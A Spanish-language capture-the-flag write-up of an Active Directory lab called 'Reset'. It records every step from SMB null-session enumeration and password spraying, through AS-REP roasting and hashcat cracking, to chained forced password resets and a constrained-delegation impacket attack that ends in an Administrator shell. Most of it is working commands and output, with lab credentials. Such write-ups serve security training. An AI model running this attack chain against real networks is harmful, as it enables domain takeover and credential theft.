🔒Reset (AD)

This challenge simulates a cyber-attack scenario where you must exploit an Active Directory environment.

Enumeración de Red

Autoscan

Scan general de puertos y scan específico de servicios y versiones

autoscan 10.10.162.86

Resultado nmap

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-06 14:57:09Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-08-06T14:58:37+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=HayStack.thm.corp
| Not valid before: 2025-08-05T14:52:19
|_Not valid after:  2026-02-04T14:52:19
| rdp-ntlm-info: 
|   Target_Name: THM
|   NetBIOS_Domain_Name: THM
|   NetBIOS_Computer_Name: HAYSTACK
|   DNS_Domain_Name: thm.corp
|   DNS_Computer_Name: HayStack.thm.corp
|   DNS_Tree_Name: thm.corp
|   Product_Version: 10.0.17763
|_  System_Time: 2025-08-06T14:57:58+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open  pando-pub?
9389/tcp  open  mc-nmf        .NET Message Framing
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: HAYSTACK; OS: Windows; CPE: cpe:/o:microsoft:windows

Windows - Active Directory
- DNS_Domain_Name: thm.corp
- DNS_Computer_Name: HayStack.thm.corp

Enumeración SMB (Null Session)

Enumerar shares con null session

smbclient -L //10.10.162.86 -N

Shares disponibles

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
Data            Disk      
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share 
SYSVOL          Disk      Logon server share

Enumerar contenido de share Data

smbclient //10.10.162.86/Data -N

Contenido de /Data/onboarding

/onboarding

d5qjgnom.i25.pdf                    A  4700896  Mon Jul 17 10:11:53 2023
eypjvoeb.s0l.txt                    A      521  Mon Aug 21 20:21:59 2023
hsq3cw3a.osj.pdf                    A  3032659  Mon Jul 17 10:12:09 2023

Descargar todo el contenido de /onboarding

mget *

eypjvoeb.s0l.txt

Contraseña potencial: ResetMe123!

mvlufahr.2zf.pdf

Usuario potencial: LILY_ONEILL

Extraer información de los pdfs

exiftool <pdfs>

Nada útil

Enumeración RPC (Null Session)

rpcclient -U "" 10.10.162.86 -N
> enumdomusers

result was NT_STATUS_ACCESS_DENIED

Enumeración LDAP

ldapsearch -x -H ldap://10.10.162.86 -s base

rootDomainNamingContext: DC=thm,DC=corp
ldapServiceName: thm.corp:[email protected]
> 0 success

Enumeración de Dominio

Enumeración de Usuarios - Kerbrute

GitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcingGitHub

kerbrute userenum --dc 10.10.162.86 -d thm.corp ~/Hunting/Wordlists/SecLists/Usernames/Names/names.txt

0 valid

RID Bruteforce - Crackmapexec

crackmapexec smb 10.10.162.86 -u anonymous -p "" --rid-brute | grep SidTypeUser | cut -d ":" -f 2 | tr '\\' ' ' | cut -d " " -f 3 > users.txt

Usuarios Potenciales

Administrator
Guest
krbtgt
HAYSTACK$
3091731410SA
ERNESTO_SILVA
TRACY_CARVER
SHAWNA_BRAY
CECILE_WONG
CYRUS_WHITEHEAD
DEANNE_WASHINGTON
ELLIOT_CHARLES
MICHEL_ROBINSON
MITCHELL_SHAW
FANNY_ALLISON
JULIANNE_HOWE
ROSLYN_MATHIS
DANIEL_CHRISTENSEN
MARCELINO_BALLARD
CRUZ_HALL
HOWARD_PAGE
STEWART_SANTANA
LINDSAY_SCHULTZ
TABATHA_BRITT
RICO_PEARSON
DARLA_WINTERS
ANDY_BLACKWELL
LILY_ONEILL
CHERYL_MULLINS
LETHA_MAYO
HORACE_BOYLE
CHRISTINA_MCCORMICK
3811465497SA
MORGAN_SELLERS
MARION_CLAY
3966486072SA
TED_JACOBSON
AUGUSTA_HAMILTON
TREVOR_MELTON
LEANN_LONG
RAQUEL_BENSON
AUTOMATE

Password Spraying - Crackmapexec

crackmapexec smb 10.10.162.86 -u users.txt -p ResetMe123!

[+] thm.corp\\LILY_ONEILL:ResetMe123!

Credenciales: LILY_ONEILL:ResetMe123!

Enumeración de Dominio - Enum4linux-ng

enum4linux-ng -A 10.10.162.86 -u LILY_ONEILL -p ResetMe123!

Sin información extra

Enumeración Autenticada SMB Shares

smbmap -u LILY_ONEILL -p 'ResetMe123!' -d thm.corp -H 10.10.162.86

Session Error - No authenticated (?)

AS-REP Roasting - Impacket

impacket-GetNPUsers thm.corp/ -dc-ip 10.10.162.86 -usersfile users.txt -format hashcat -outputfile hashes.txt -no-pass

3 Hashes: ERNESTO_SILVA, TABATHA_BRITT y LEANN_LONG

hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt

Hash Cracked: TABATHA_BRITT:marlboro(1985)

Enumeración Autenticada SMB Shares II

smbmap -u TABATHA_BRITT -p 'marlboro(1985)' -d thm.corp -H 10.10.162.86

Disk             Permissions     Comment
----             -----------     -------
ADMIN$           NO ACCESS       Remote Admin
C$               NO ACCESS       Default share
Data             READ, WRITE
IPC$             READ ONLY       Remote IPC
NETLOGON         READ ONLY       Logon server share 
SYSVOL           READ ONLY       Logon server share

Enumeración Autenticada de Dominio - BloodHound

Recolección

bloodhound-python -u TABATHA_BRITT -p 'marlboro(1985)' -d thm.corp -ns 10.10.162.86 -c All --zip

Información Extraída

TABATHA_BRITT → (generic_all) → SHAWNA_BRAY & RAQUEL_BENSON

The GenericAll permission grants [email protected] the ability to change the password of the user without knowing their current password. This is equivalent to the ForceChangePassword edge in BloodHound.

Escalada de Privilegios: Explotando `ForceChangePassword`

Resetear contraseña de Shawna

net rpc password "SHAWNA_BRAY" "Nuevapass69#" -U "THM.CORP"/"TABATHA_BRITT"%"marlboro(1985)" -S "10.10.219.124"

BloodHound info: SHAWNA_BRAY → (ForceChangePassword) → CRUZ_HALL

Resetear contraseña de Cruz

net rpc password "CRUZ_HALL" "Nuevapass69#" -U "THM.CORP"/"SHAWNA_BRAY"%"Nuevapass69#" -S "10.10.219.124"

BloodHound info: CRUZ_HALL → (ForceChangePassword) → DARLA_WINTERS

Resetear contraseña de Darla

net rpc password "DARLA_WINTERS" "Nuevapass69#" -U "THM.CORP"/"CRUZ_HALL"%"Nuevapass69#" -S "10.10.219.124"

Información de BloodHound

DARLA_WINTERS → (allowedToDelegate) → Computer: HAYSTACK.THM.CORP

The user [email protected] has the constrained delegation permission to the computer HAYSTACK.THM.CORP

The constrained delegation primitive allows a principal to authenticate as any user to specific services on the target computer. That is, a node with this permission can impersonate any domain principal (including Domain Admins) to the specific service on the target host. The alternative sname "cifs" is substituted in to the final service ticket. This grants the attacker the ability to access the file system of PRIMARY.testlab.local as the "admin" user.

Escalada de Privilegios: Explotando `AllowedToDelegate`

Cachear TGT del Administrador

impacket-getST -spn "cifs/haystack.thm.corp" -impersonate "Administrator" -dc-ip 10.10.219.124 "thm.corp/DARLA_WINTERS:Nuevapass69#"

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@[email protected]

Exportar el TGT como variable de entorno

mv Administrator@[email protected] admin.ccache
export KRB5CCNAME=admin.ccache

Establecer Windows Remote Session como Administrador

impacket-wmiexec -k -no-pass [email protected]

Compromiso del Sistema

Shell: Administrador

Última actualización hace 4 meses